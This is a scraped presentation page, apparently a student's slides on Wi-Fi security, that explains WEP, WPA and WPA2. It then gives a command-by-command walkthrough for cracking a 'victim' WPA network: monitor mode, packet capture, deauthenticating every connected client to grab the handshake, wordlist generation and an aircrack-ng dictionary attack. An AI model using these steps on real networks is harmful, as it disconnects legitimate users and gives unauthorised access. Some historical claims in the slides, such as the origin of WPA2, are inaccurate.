SlideShare a Scribd company logo
1 of 41
Cyber Security
AhmadYar
BS Computer Science
Bahauddin Zakariya University Multan (BZU)
Sahiwal Campus.
Email ahmadyark1@gmail.com
Mobile +92303 9464551
Content
• Aircrack-ng
• WEP
• WAP
• WAP2
• Practical Implementation
12/18/2018ahmadyark1@gmail.com 3
What is Aircrack-ng?
• Aircrack-ng is the primary application with the aircrack-ng suite, which
is used for password cracking.
• It's capable of using techniques to crackWEP and dictionary cracks for
WPA andWPA2 after capturing the WPA handshake.
12/18/2018ahmadyark1@gmail.com 4
Wired Equivalency Privacy (WEP)
• Developed in the late 1990’s as the first encryption algorithm for the 802.11
standard, WEP was designed with one main goal in mind:
• to prevent hackers from snooping on wireless data as it was transmitted
between clients and access points (APs). From the start, however, WEP
lacked the strength necessary to accomplish this.
12/18/2018ahmadyark1@gmail.com 5
WEP Continue..
• Cyber security experts identified several severe flaws inWEP in 2001,
eventually leading to industry wide recommendations to phase out the use
ofWEP in both enterprise and consumer devices.
• After a large-scale cyber attack executed againstT.J. Maxx in 2009 was
traced back to vulnerabilities exposed by WEP.
12/18/2018ahmadyark1@gmail.com 6
What isWPA ?
• Stands for "Wi-Fi Protected Access.“
• WPA is a security protocol designed to create secure wireless (Wi-Fi)
networks. It is similar to the WEP protocol, but offers improvements in the
way it handles security keys and the way users are authorized.
12/18/2018ahmadyark1@gmail.com 7
Continue..
• For an encrypted data transfer to work, both systems on the beginning and
end of a data transfer must use the same encryption/decryption key. While
WEP provides each authorized system with the same key,WPA uses the
temporal key integrity protocol (TKIP), which dynamically changes the key
that the systems use.This prevents intruders from creating their own
encryption key to match the one used by the secure network.
12/18/2018ahmadyark1@gmail.com 8
Continue…
• WPA also implements something called the Extensible Authentication
Protocol (EAP) for authorizing users.
• Instead of authorizing computers based solely on their MAC address, WPA
can use several other methods to verify each computer's identity. This
makes it more difficult for unauthorized systems to gain access to the
wireless network.
12/18/2018ahmadyark1@gmail.com 9
WPA2
• Developed by the U.S. government to protect classified data.
• As the successor toWPA, the WPA2 standard was ratified by the IEEE in
2004 as 802.11i.
• AlthoughWPA2 still has vulnerabilities, it is considered the most secure
wireless security standard available.
12/18/2018ahmadyark1@gmail.com 10
Continue…
• WPA2TKIP with Counter Mode with Cipher Block Chaining Message
Authentication Code Protocol (CCMP)
• Also meant to be backward-compatible, WPA2 supportsTKIP as a fallback if
a device cannot support CCMP.
12/18/2018ahmadyark1@gmail.com 11
Continue…
• CCMP protects data confidentiality by allowing only authorized network
users to receive data, and it uses cipher block chaining message
authentication code to ensure message integrity.
12/18/2018ahmadyark1@gmail.com 12
Tools Used
1. Wi-Fi Booster
2. VMware Workstation
3. Kali Linux
12/18/2018ahmadyark1@gmail.com 13
Wi-Fi Booster
1. Make broadband wireless in possible coverage
2. Strengthen radio signal to increase the effective range and coverage area
for effective range and coverage area forWi-Fi communication.
3. Install easily, just plug in and play.
4. Save lots of wiring costs
12/18/2018ahmadyark1@gmail.com 14
VMwareWorkstation
1. Secure way to run multiple operating systems at the same time.
2. It is an integral component of any serious technical professional’s toolkit.
3. It offers the broadest host and guest operating system support, the richest
user operating system support, the richest user experience, and the most
comprehensive experience, and the most comprehensive feature set.
12/18/2018ahmadyark1@gmail.com 15
Kali Linux
• Kali Linux is a Debian-derived Linux distribution designed for digital
forensics and penetration testing. It is maintained and funded by Offensive
Security Ltd
12/18/2018ahmadyark1@gmail.com 16
Wireless Attacks tools
• Airbase-ng
• Aircrack-ng
• Airdecap-ng and Airdecloak-ng
• Aireplay-ng
• Airmon-ng
• Airodump-ng
• airodump-ng-oui-update
• Airolib-ng
• Airserv-ng
• Airtun-ng
• Asleap
12/18/2018
ahmadyark1@gmail.com
17
Process
• Install aVMware workstation on your Computer
• Open theVMware workstation and install Kali Linux on it
• After completing installation
• Go toVM>Removable Device
• And now connect yourWi-Fi Booster orWi-Fi Receiver on it.
12/18/2018ahmadyark1@gmail.com 18
Penetration Of AWireless Network StartsWith
Logging Into Kali
• If you haven’t already login to Kali, the default login information
is: root(Username) and toor (Password)
12/18/2018
ahmadyark1@gmail.com
19
WPA Handshake?
• How do hackers or remote attackers obtain the WPA or
WPA2Handshake from a wireless access point easily?
By launching a Wi-Fi bomb they can force all users to disconnect the access
point for a few seconds. Their software will automatically reconnect and this
way they sniff the connection handshake.
12/18/2018ahmadyark1@gmail.com 20
How WIFI works?
• Wi-Fi transmits signal in the form of packets in air so we need to capture all
the packets in air so we use airodump to dump all the packets in air .After
that we should see that if any one is connected to the victim Wi-Fi. If anyone
is not connected the Wi-Fi, cracking is not possible as we need a wpa
handshake. We can capture handshake by sending DE authentication
packets to client connected toWi-Fi. Aircrack cracks the password.
12/18/2018ahmadyark1@gmail.com 21
“iwconfig” command
This command is need to know the name of the wireless adapter
connected to the computer because computer has many adapters
connected.
12/18/2018ahmadyark1@gmail.com 22
12/18/2018ahmadyark1@gmail.com 23
“airmon-ng check kill” command
• This script can be used to enable monitor mode on wireless interfaces. It
may also be used to go back from monitor mode to managed mode.
Entering the airmon-ng command without parameters will show the
interfaces status.
12/18/2018ahmadyark1@gmail.com 24
12/18/2018
ahmadyark1@gmail.com 25
“airmon-ng start wlan0” command
• This command will enable the monitor mode on the Wi-Fi card. So while
using interface in any terminal or command line use “wlan0mon”.
12/18/2018ahmadyark1@gmail.com 26
12/18/2018ahmadyark1@gmail.com 27
”airodump-ng wlanOmon” command
• This will display all the access points in your surroundings and also the
clients connected to that access points
• All the user using this Wi-Fi router.
12/18/2018ahmadyark1@gmail.com 28
12/18/2018ahmadyark1@gmail.com 29
“airodump-ng -c channel –bssid [bssid of Wi-Fi] -w [path to
write the data of packets] wlan0mon[interface]” command
• -bssid in my case bssid is indicated with red mark.
• -c channel is the channel of victim Wi-Fi in my case it is 10(see in previous
screenshot for channel number)
• -w It is used to write the captured data to a specified path in my case it is
‘/root/Desktop/hack’.
• Interface in my case is wlan0mon
12/18/2018ahmadyark1@gmail.com 30
12/18/2018ahmadyark1@gmail.com 31
12/18/2018ahmadyark1@gmail.com 32
“aireplay-ng –deauth 10 -a [router bssid]
interface” command
•In this step we DE authenticate the connected clients
to theWi-Fi
•All the users connected toWi-Fi router disconnects.
12/18/2018ahmadyark1@gmail.com 33
12/18/2018ahmadyark1@gmail.com 34
•After this the client tries to connect to theWi-Fi
again. At that time, we will capture the packets
which sends from client. From this result, we
will get wpa handshake.
12/18/2018ahmadyark1@gmail.com 35
12/18/2018ahmadyark1@gmail.com 36
Create wordlist
12/18/2018ahmadyark1@gmail.com 37
“Crunch 8 8 1234abcd –o wordlist” command
12/18/2018ahmadyark1@gmail.com 38
“aircrack-ng -b [bssid of router] -w [path to word list]
[path to capture packets]” command
12/18/2018ahmadyark1@gmail.com
39
12/18/2018ahmadyark1@gmail.com
40
12/18/2018ahmadyark1@gmail.com 41

More Related Content

What's hot

9 palo alto virtual routers concept (routing on palo alto)
9 palo alto virtual routers concept (routing on palo alto)9 palo alto virtual routers concept (routing on palo alto)
9 palo alto virtual routers concept (routing on palo alto)Mostafa El Lathy
 
10 palo alto nat policy concepts
10 palo alto nat policy concepts10 palo alto nat policy concepts
10 palo alto nat policy conceptsMostafa El Lathy
 
01- intro to firewall concepts
01- intro to firewall concepts01- intro to firewall concepts
01- intro to firewall conceptsMostafa El Lathy
 
Web Application Firewall intro
Web Application Firewall introWeb Application Firewall intro
Web Application Firewall introRich Helton
 
Palo alto networks product overview
Palo alto networks product overviewPalo alto networks product overview
Palo alto networks product overviewBelsoft
 
8 palo alto security policy concepts
8 palo alto security policy concepts8 palo alto security policy concepts
8 palo alto security policy conceptsMostafa El Lathy
 
17 palo alto threat prevention concept
17 palo alto threat prevention concept17 palo alto threat prevention concept
17 palo alto threat prevention conceptMostafa El Lathy
 
2 what is the best firewall (sizing)
2 what is the best firewall (sizing)2 what is the best firewall (sizing)
2 what is the best firewall (sizing)Mostafa El Lathy
 
15 intro to ssl certificate & pki concept
15 intro to ssl certificate & pki concept15 intro to ssl certificate & pki concept
15 intro to ssl certificate & pki conceptMostafa El Lathy
 
13 palo alto url web filtering concept
13 palo alto url web filtering concept13 palo alto url web filtering concept
13 palo alto url web filtering conceptMostafa El Lathy
 
End to End Security With Palo Alto Networks (Onur Kasap, engineer Palo Alto N...
End to End Security With Palo Alto Networks (Onur Kasap, engineer Palo Alto N...End to End Security With Palo Alto Networks (Onur Kasap, engineer Palo Alto N...
End to End Security With Palo Alto Networks (Onur Kasap, engineer Palo Alto N...BAKOTECH
 
Email security
Email securityEmail security
Email securitySultanErbo
 
Wireless Security null seminar
Wireless Security null seminarWireless Security null seminar
Wireless Security null seminarNilesh Sapariya
 

What's hot (20)

9 palo alto virtual routers concept (routing on palo alto)
9 palo alto virtual routers concept (routing on palo alto)9 palo alto virtual routers concept (routing on palo alto)
9 palo alto virtual routers concept (routing on palo alto)
 
10 palo alto nat policy concepts
10 palo alto nat policy concepts10 palo alto nat policy concepts
10 palo alto nat policy concepts
 
Firewall
FirewallFirewall
Firewall
 
01- intro to firewall concepts
01- intro to firewall concepts01- intro to firewall concepts
01- intro to firewall concepts
 
Web Application Firewall intro
Web Application Firewall introWeb Application Firewall intro
Web Application Firewall intro
 
4 palo alto licenses
4 palo alto licenses4 palo alto licenses
4 palo alto licenses
 
Palo alto networks product overview
Palo alto networks product overviewPalo alto networks product overview
Palo alto networks product overview
 
8 palo alto security policy concepts
8 palo alto security policy concepts8 palo alto security policy concepts
8 palo alto security policy concepts
 
17 palo alto threat prevention concept
17 palo alto threat prevention concept17 palo alto threat prevention concept
17 palo alto threat prevention concept
 
2 what is the best firewall (sizing)
2 what is the best firewall (sizing)2 what is the best firewall (sizing)
2 what is the best firewall (sizing)
 
15 intro to ssl certificate & pki concept
15 intro to ssl certificate & pki concept15 intro to ssl certificate & pki concept
15 intro to ssl certificate & pki concept
 
13 palo alto url web filtering concept
13 palo alto url web filtering concept13 palo alto url web filtering concept
13 palo alto url web filtering concept
 
End to End Security With Palo Alto Networks (Onur Kasap, engineer Palo Alto N...
End to End Security With Palo Alto Networks (Onur Kasap, engineer Palo Alto N...End to End Security With Palo Alto Networks (Onur Kasap, engineer Palo Alto N...
End to End Security With Palo Alto Networks (Onur Kasap, engineer Palo Alto N...
 
Palo alto-review
Palo alto-reviewPalo alto-review
Palo alto-review
 
Email security
Email securityEmail security
Email security
 
Wpa vs Wpa2
Wpa vs Wpa2Wpa vs Wpa2
Wpa vs Wpa2
 
Wireless Security null seminar
Wireless Security null seminarWireless Security null seminar
Wireless Security null seminar
 
Fortigate Training
Fortigate TrainingFortigate Training
Fortigate Training
 
Firewall
FirewallFirewall
Firewall
 
Wireshark
WiresharkWireshark
Wireshark
 

Similar to How Hack WiFi through Aircrack-ng in Kali Linux Cyber Security

Wireless Pentesting: It's more than cracking WEP
Wireless Pentesting: It's  more than cracking WEPWireless Pentesting: It's  more than cracking WEP
Wireless Pentesting: It's more than cracking WEPJoe McCray
 
Chapter 10 wireless hacking [compatibility mode]
Chapter 10 wireless hacking [compatibility mode]Chapter 10 wireless hacking [compatibility mode]
Chapter 10 wireless hacking [compatibility mode]Setia Juli Irzal Ismail
 
Cisco umbrella youtube
Cisco umbrella youtubeCisco umbrella youtube
Cisco umbrella youtubeDhruv Sharma
 
CIRA Labs - Secure Home Gateway Project 2019-03.pptx
CIRA Labs - Secure Home Gateway Project 2019-03.pptxCIRA Labs - Secure Home Gateway Project 2019-03.pptx
CIRA Labs - Secure Home Gateway Project 2019-03.pptxssuserfb92ae
 
Cracking wep and wpa wireless networks
Cracking wep and wpa wireless networksCracking wep and wpa wireless networks
Cracking wep and wpa wireless networksMaghan Das
 
wifi-y3dips-stmik_mdp_slides
wifi-y3dips-stmik_mdp_slideswifi-y3dips-stmik_mdp_slides
wifi-y3dips-stmik_mdp_slidesguest1c1a9a
 
Workshop on Wireless Security
Workshop on Wireless SecurityWorkshop on Wireless Security
Workshop on Wireless Securityamiable_indian
 
Sheetal - Wirelesss Hacking - ClubHack2008
Sheetal - Wirelesss Hacking - ClubHack2008Sheetal - Wirelesss Hacking - ClubHack2008
Sheetal - Wirelesss Hacking - ClubHack2008ClubHack
 
DEF CON 24 - Rich Mogull - pragmatic cloud security
DEF CON 24 - Rich Mogull - pragmatic cloud securityDEF CON 24 - Rich Mogull - pragmatic cloud security
DEF CON 24 - Rich Mogull - pragmatic cloud securityFelipe Prado
 
Section 3 - Technical Sales Foundations for IBM QRadar for Cloud (QRoC)V1 P10...
Section 3 - Technical Sales Foundations for IBM QRadar for Cloud (QRoC)V1 P10...Section 3 - Technical Sales Foundations for IBM QRadar for Cloud (QRoC)V1 P10...
Section 3 - Technical Sales Foundations for IBM QRadar for Cloud (QRoC)V1 P10...hasimatwork
 
26.1.7 lab snort and firewall rules
26.1.7 lab   snort and firewall rules26.1.7 lab   snort and firewall rules
26.1.7 lab snort and firewall rulesFreddy Buenaño
 
Build enterprise wireless with CAPsMAN
Build enterprise wireless with CAPsMANBuild enterprise wireless with CAPsMAN
Build enterprise wireless with CAPsMANGLC Networks
 
Bandit and Gosec - Security Linters
Bandit and Gosec - Security LintersBandit and Gosec - Security Linters
Bandit and Gosec - Security LintersAll Things Open
 
Bandit and Gosec - Security Linters
Bandit and Gosec - Security LintersBandit and Gosec - Security Linters
Bandit and Gosec - Security LintersEricBrown328
 
LoginCat from TekMonks
LoginCat from TekMonksLoginCat from TekMonks
LoginCat from TekMonksRohit Kapoor
 
Talk2 esc2 muscl-wifi_v1_2b
Talk2 esc2 muscl-wifi_v1_2bTalk2 esc2 muscl-wifi_v1_2b
Talk2 esc2 muscl-wifi_v1_2bSylvain Martinez
 

Similar to How Hack WiFi through Aircrack-ng in Kali Linux Cyber Security (20)

Wireless Pentesting: It's more than cracking WEP
Wireless Pentesting: It's  more than cracking WEPWireless Pentesting: It's  more than cracking WEP
Wireless Pentesting: It's more than cracking WEP
 
Chapter 10 wireless hacking [compatibility mode]
Chapter 10 wireless hacking [compatibility mode]Chapter 10 wireless hacking [compatibility mode]
Chapter 10 wireless hacking [compatibility mode]
 
Cisco umbrella youtube
Cisco umbrella youtubeCisco umbrella youtube
Cisco umbrella youtube
 
CIRA Labs - Secure Home Gateway Project 2019-03.pptx
CIRA Labs - Secure Home Gateway Project 2019-03.pptxCIRA Labs - Secure Home Gateway Project 2019-03.pptx
CIRA Labs - Secure Home Gateway Project 2019-03.pptx
 
Cracking wep and wpa wireless networks
Cracking wep and wpa wireless networksCracking wep and wpa wireless networks
Cracking wep and wpa wireless networks
 
ClearPass design scenarios that solve the toughest security policy requirements
ClearPass design scenarios that solve the toughest security policy requirementsClearPass design scenarios that solve the toughest security policy requirements
ClearPass design scenarios that solve the toughest security policy requirements
 
wifi-y3dips-stmik_mdp_slides
wifi-y3dips-stmik_mdp_slideswifi-y3dips-stmik_mdp_slides
wifi-y3dips-stmik_mdp_slides
 
wifi
wifiwifi
wifi
 
Workshop on Wireless Security
Workshop on Wireless SecurityWorkshop on Wireless Security
Workshop on Wireless Security
 
Sheetal - Wirelesss Hacking - ClubHack2008
Sheetal - Wirelesss Hacking - ClubHack2008Sheetal - Wirelesss Hacking - ClubHack2008
Sheetal - Wirelesss Hacking - ClubHack2008
 
DEF CON 24 - Rich Mogull - pragmatic cloud security
DEF CON 24 - Rich Mogull - pragmatic cloud securityDEF CON 24 - Rich Mogull - pragmatic cloud security
DEF CON 24 - Rich Mogull - pragmatic cloud security
 
Section 3 - Technical Sales Foundations for IBM QRadar for Cloud (QRoC)V1 P10...
Section 3 - Technical Sales Foundations for IBM QRadar for Cloud (QRoC)V1 P10...Section 3 - Technical Sales Foundations for IBM QRadar for Cloud (QRoC)V1 P10...
Section 3 - Technical Sales Foundations for IBM QRadar for Cloud (QRoC)V1 P10...
 
26.1.7 lab snort and firewall rules
26.1.7 lab   snort and firewall rules26.1.7 lab   snort and firewall rules
26.1.7 lab snort and firewall rules
 
Build enterprise wireless with CAPsMAN
Build enterprise wireless with CAPsMANBuild enterprise wireless with CAPsMAN
Build enterprise wireless with CAPsMAN
 
Bandit and Gosec - Security Linters
Bandit and Gosec - Security LintersBandit and Gosec - Security Linters
Bandit and Gosec - Security Linters
 
Bandit and Gosec - Security Linters
Bandit and Gosec - Security LintersBandit and Gosec - Security Linters
Bandit and Gosec - Security Linters
 
LoginCat from TekMonks
LoginCat from TekMonksLoginCat from TekMonks
LoginCat from TekMonks
 
Wireless Network Security Palo Alto Networks / Aruba Networks Integration
Wireless Network Security Palo Alto Networks / Aruba Networks IntegrationWireless Network Security Palo Alto Networks / Aruba Networks Integration
Wireless Network Security Palo Alto Networks / Aruba Networks Integration
 
Talk2 esc2 muscl-wifi_v1_2b
Talk2 esc2 muscl-wifi_v1_2bTalk2 esc2 muscl-wifi_v1_2b
Talk2 esc2 muscl-wifi_v1_2b
 
Wi-FI Hacking
Wi-FI Hacking Wi-FI Hacking
Wi-FI Hacking
 

Recently uploaded

Google Gemini An AI Revolution in Education.pptx
Google Gemini An AI Revolution in Education.pptxGoogle Gemini An AI Revolution in Education.pptx
Google Gemini An AI Revolution in Education.pptxDr. Sarita Anand
 
Food safety_Challenges food safety laboratories_.pdf
Food safety_Challenges food safety laboratories_.pdfFood safety_Challenges food safety laboratories_.pdf
Food safety_Challenges food safety laboratories_.pdfSherif Taha
 
Holdier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdfHoldier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdfagholdier
 
The basics of sentences session 3pptx.pptx
The basics of sentences session 3pptx.pptxThe basics of sentences session 3pptx.pptx
The basics of sentences session 3pptx.pptxheathfieldcps1
 
Fostering Friendships - Enhancing Social Bonds in the Classroom
Fostering Friendships - Enhancing Social Bonds  in the ClassroomFostering Friendships - Enhancing Social Bonds  in the Classroom
Fostering Friendships - Enhancing Social Bonds in the ClassroomPooky Knightsmith
 
How to Create and Manage Wizard in Odoo 17
How to Create and Manage Wizard in Odoo 17How to Create and Manage Wizard in Odoo 17
How to Create and Manage Wizard in Odoo 17Celine George
 
Spellings Wk 3 English CAPS CARES Please Practise
Spellings Wk 3 English CAPS CARES Please PractiseSpellings Wk 3 English CAPS CARES Please Practise
Spellings Wk 3 English CAPS CARES Please PractiseAnaAcapella
 
Unit-V; Pricing (Pharma Marketing Management).pptx
Unit-V; Pricing (Pharma Marketing Management).pptxUnit-V; Pricing (Pharma Marketing Management).pptx
Unit-V; Pricing (Pharma Marketing Management).pptxVishalSingh1417
 
HMCS Vancouver Pre-Deployment Brief - May 2024 (Web Version).pptx
HMCS Vancouver Pre-Deployment Brief - May 2024 (Web Version).pptxHMCS Vancouver Pre-Deployment Brief - May 2024 (Web Version).pptx
HMCS Vancouver Pre-Deployment Brief - May 2024 (Web Version).pptxmarlenawright1
 
Wellbeing inclusion and digital dystopias.pptx
Wellbeing inclusion and digital dystopias.pptxWellbeing inclusion and digital dystopias.pptx
Wellbeing inclusion and digital dystopias.pptxJisc
 
Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...
Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...
Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...ZurliaSoop
 
General Principles of Intellectual Property: Concepts of Intellectual Proper...
General Principles of Intellectual Property: Concepts of Intellectual  Proper...General Principles of Intellectual Property: Concepts of Intellectual  Proper...
General Principles of Intellectual Property: Concepts of Intellectual Proper...Poonam Aher Patil
 
2024-NATIONAL-LEARNING-CAMP-AND-OTHER.pptx
2024-NATIONAL-LEARNING-CAMP-AND-OTHER.pptx2024-NATIONAL-LEARNING-CAMP-AND-OTHER.pptx
2024-NATIONAL-LEARNING-CAMP-AND-OTHER.pptxMaritesTamaniVerdade
 
Kodo Millet PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...
Kodo Millet  PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...Kodo Millet  PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...
Kodo Millet PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...pradhanghanshyam7136
 
Sensory_Experience_and_Emotional_Resonance_in_Gabriel_Okaras_The_Piano_and_Th...
Sensory_Experience_and_Emotional_Resonance_in_Gabriel_Okaras_The_Piano_and_Th...Sensory_Experience_and_Emotional_Resonance_in_Gabriel_Okaras_The_Piano_and_Th...
Sensory_Experience_and_Emotional_Resonance_in_Gabriel_Okaras_The_Piano_and_Th...Pooja Bhuva
 
Micro-Scholarship, What it is, How can it help me.pdf
Micro-Scholarship, What it is, How can it help me.pdfMicro-Scholarship, What it is, How can it help me.pdf
Micro-Scholarship, What it is, How can it help me.pdfPoh-Sun Goh
 
Unit 3 Emotional Intelligence and Spiritual Intelligence.pdf
Unit 3 Emotional Intelligence and Spiritual Intelligence.pdfUnit 3 Emotional Intelligence and Spiritual Intelligence.pdf
Unit 3 Emotional Intelligence and Spiritual Intelligence.pdfDr Vijay Vishwakarma
 
Accessible Digital Futures project (20/03/2024)
Accessible Digital Futures project (20/03/2024)Accessible Digital Futures project (20/03/2024)
Accessible Digital Futures project (20/03/2024)Jisc
 
ICT Role in 21st Century Education & its Challenges.pptx
ICT Role in 21st Century Education & its Challenges.pptxICT Role in 21st Century Education & its Challenges.pptx
ICT Role in 21st Century Education & its Challenges.pptxAreebaZafar22
 
UGC NET Paper 1 Mathematical Reasoning & Aptitude.pdf
UGC NET Paper 1 Mathematical Reasoning & Aptitude.pdfUGC NET Paper 1 Mathematical Reasoning & Aptitude.pdf
UGC NET Paper 1 Mathematical Reasoning & Aptitude.pdfNirmal Dwivedi
 

Recently uploaded (20)

Google Gemini An AI Revolution in Education.pptx
Google Gemini An AI Revolution in Education.pptxGoogle Gemini An AI Revolution in Education.pptx
Google Gemini An AI Revolution in Education.pptx
 
Food safety_Challenges food safety laboratories_.pdf
Food safety_Challenges food safety laboratories_.pdfFood safety_Challenges food safety laboratories_.pdf
Food safety_Challenges food safety laboratories_.pdf
 
Holdier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdfHoldier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdf
 
The basics of sentences session 3pptx.pptx
The basics of sentences session 3pptx.pptxThe basics of sentences session 3pptx.pptx
The basics of sentences session 3pptx.pptx
 
Fostering Friendships - Enhancing Social Bonds in the Classroom
Fostering Friendships - Enhancing Social Bonds  in the ClassroomFostering Friendships - Enhancing Social Bonds  in the Classroom
Fostering Friendships - Enhancing Social Bonds in the Classroom
 
How to Create and Manage Wizard in Odoo 17
How to Create and Manage Wizard in Odoo 17How to Create and Manage Wizard in Odoo 17
How to Create and Manage Wizard in Odoo 17
 
Spellings Wk 3 English CAPS CARES Please Practise
Spellings Wk 3 English CAPS CARES Please PractiseSpellings Wk 3 English CAPS CARES Please Practise
Spellings Wk 3 English CAPS CARES Please Practise
 
Unit-V; Pricing (Pharma Marketing Management).pptx
Unit-V; Pricing (Pharma Marketing Management).pptxUnit-V; Pricing (Pharma Marketing Management).pptx
Unit-V; Pricing (Pharma Marketing Management).pptx
 
HMCS Vancouver Pre-Deployment Brief - May 2024 (Web Version).pptx
HMCS Vancouver Pre-Deployment Brief - May 2024 (Web Version).pptxHMCS Vancouver Pre-Deployment Brief - May 2024 (Web Version).pptx
HMCS Vancouver Pre-Deployment Brief - May 2024 (Web Version).pptx
 
Wellbeing inclusion and digital dystopias.pptx
Wellbeing inclusion and digital dystopias.pptxWellbeing inclusion and digital dystopias.pptx
Wellbeing inclusion and digital dystopias.pptx
 
Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...
Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...
Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...
 
General Principles of Intellectual Property: Concepts of Intellectual Proper...
General Principles of Intellectual Property: Concepts of Intellectual  Proper...General Principles of Intellectual Property: Concepts of Intellectual  Proper...
General Principles of Intellectual Property: Concepts of Intellectual Proper...
 
2024-NATIONAL-LEARNING-CAMP-AND-OTHER.pptx
2024-NATIONAL-LEARNING-CAMP-AND-OTHER.pptx2024-NATIONAL-LEARNING-CAMP-AND-OTHER.pptx
2024-NATIONAL-LEARNING-CAMP-AND-OTHER.pptx
 
Kodo Millet PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...
Kodo Millet  PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...Kodo Millet  PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...
Kodo Millet PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...
 
Sensory_Experience_and_Emotional_Resonance_in_Gabriel_Okaras_The_Piano_and_Th...
Sensory_Experience_and_Emotional_Resonance_in_Gabriel_Okaras_The_Piano_and_Th...Sensory_Experience_and_Emotional_Resonance_in_Gabriel_Okaras_The_Piano_and_Th...
Sensory_Experience_and_Emotional_Resonance_in_Gabriel_Okaras_The_Piano_and_Th...
 
Micro-Scholarship, What it is, How can it help me.pdf
Micro-Scholarship, What it is, How can it help me.pdfMicro-Scholarship, What it is, How can it help me.pdf
Micro-Scholarship, What it is, How can it help me.pdf
 
Unit 3 Emotional Intelligence and Spiritual Intelligence.pdf
Unit 3 Emotional Intelligence and Spiritual Intelligence.pdfUnit 3 Emotional Intelligence and Spiritual Intelligence.pdf
Unit 3 Emotional Intelligence and Spiritual Intelligence.pdf
 
Accessible Digital Futures project (20/03/2024)
Accessible Digital Futures project (20/03/2024)Accessible Digital Futures project (20/03/2024)
Accessible Digital Futures project (20/03/2024)
 
ICT Role in 21st Century Education & its Challenges.pptx
ICT Role in 21st Century Education & its Challenges.pptxICT Role in 21st Century Education & its Challenges.pptx
ICT Role in 21st Century Education & its Challenges.pptx
 
UGC NET Paper 1 Mathematical Reasoning & Aptitude.pdf
UGC NET Paper 1 Mathematical Reasoning & Aptitude.pdfUGC NET Paper 1 Mathematical Reasoning & Aptitude.pdf
UGC NET Paper 1 Mathematical Reasoning & Aptitude.pdf
 

How Hack WiFi through Aircrack-ng in Kali Linux Cyber Security

  • 1.
  • 2. Cyber Security AhmadYar BS Computer Science Bahauddin Zakariya University Multan (BZU) Sahiwal Campus. Email ahmadyark1@gmail.com Mobile +92303 9464551
  • 3. Content • Aircrack-ng • WEP • WAP • WAP2 • Practical Implementation 12/18/2018ahmadyark1@gmail.com 3
  • 4. What is Aircrack-ng? • Aircrack-ng is the primary application with the aircrack-ng suite, which is used for password cracking. • It's capable of using techniques to crackWEP and dictionary cracks for WPA andWPA2 after capturing the WPA handshake. 12/18/2018ahmadyark1@gmail.com 4
  • 5. Wired Equivalency Privacy (WEP) • Developed in the late 1990’s as the first encryption algorithm for the 802.11 standard, WEP was designed with one main goal in mind: • to prevent hackers from snooping on wireless data as it was transmitted between clients and access points (APs). From the start, however, WEP lacked the strength necessary to accomplish this. 12/18/2018ahmadyark1@gmail.com 5
  • 6. WEP Continue.. • Cyber security experts identified several severe flaws inWEP in 2001, eventually leading to industry wide recommendations to phase out the use ofWEP in both enterprise and consumer devices. • After a large-scale cyber attack executed againstT.J. Maxx in 2009 was traced back to vulnerabilities exposed by WEP. 12/18/2018ahmadyark1@gmail.com 6
  • 7. What isWPA ? • Stands for "Wi-Fi Protected Access.“ • WPA is a security protocol designed to create secure wireless (Wi-Fi) networks. It is similar to the WEP protocol, but offers improvements in the way it handles security keys and the way users are authorized. 12/18/2018ahmadyark1@gmail.com 7
  • 8. Continue.. • For an encrypted data transfer to work, both systems on the beginning and end of a data transfer must use the same encryption/decryption key. While WEP provides each authorized system with the same key,WPA uses the temporal key integrity protocol (TKIP), which dynamically changes the key that the systems use.This prevents intruders from creating their own encryption key to match the one used by the secure network. 12/18/2018ahmadyark1@gmail.com 8
  • 9. Continue… • WPA also implements something called the Extensible Authentication Protocol (EAP) for authorizing users. • Instead of authorizing computers based solely on their MAC address, WPA can use several other methods to verify each computer's identity. This makes it more difficult for unauthorized systems to gain access to the wireless network. 12/18/2018ahmadyark1@gmail.com 9
  • 10. WPA2 • Developed by the U.S. government to protect classified data. • As the successor toWPA, the WPA2 standard was ratified by the IEEE in 2004 as 802.11i. • AlthoughWPA2 still has vulnerabilities, it is considered the most secure wireless security standard available. 12/18/2018ahmadyark1@gmail.com 10
  • 11. Continue… • WPA2TKIP with Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP) • Also meant to be backward-compatible, WPA2 supportsTKIP as a fallback if a device cannot support CCMP. 12/18/2018ahmadyark1@gmail.com 11
  • 12. Continue… • CCMP protects data confidentiality by allowing only authorized network users to receive data, and it uses cipher block chaining message authentication code to ensure message integrity. 12/18/2018ahmadyark1@gmail.com 12
  • 13. Tools Used 1. Wi-Fi Booster 2. VMware Workstation 3. Kali Linux 12/18/2018ahmadyark1@gmail.com 13
  • 14. Wi-Fi Booster 1. Make broadband wireless in possible coverage 2. Strengthen radio signal to increase the effective range and coverage area for effective range and coverage area forWi-Fi communication. 3. Install easily, just plug in and play. 4. Save lots of wiring costs 12/18/2018ahmadyark1@gmail.com 14
  • 15. VMwareWorkstation 1. Secure way to run multiple operating systems at the same time. 2. It is an integral component of any serious technical professional’s toolkit. 3. It offers the broadest host and guest operating system support, the richest user operating system support, the richest user experience, and the most comprehensive experience, and the most comprehensive feature set. 12/18/2018ahmadyark1@gmail.com 15
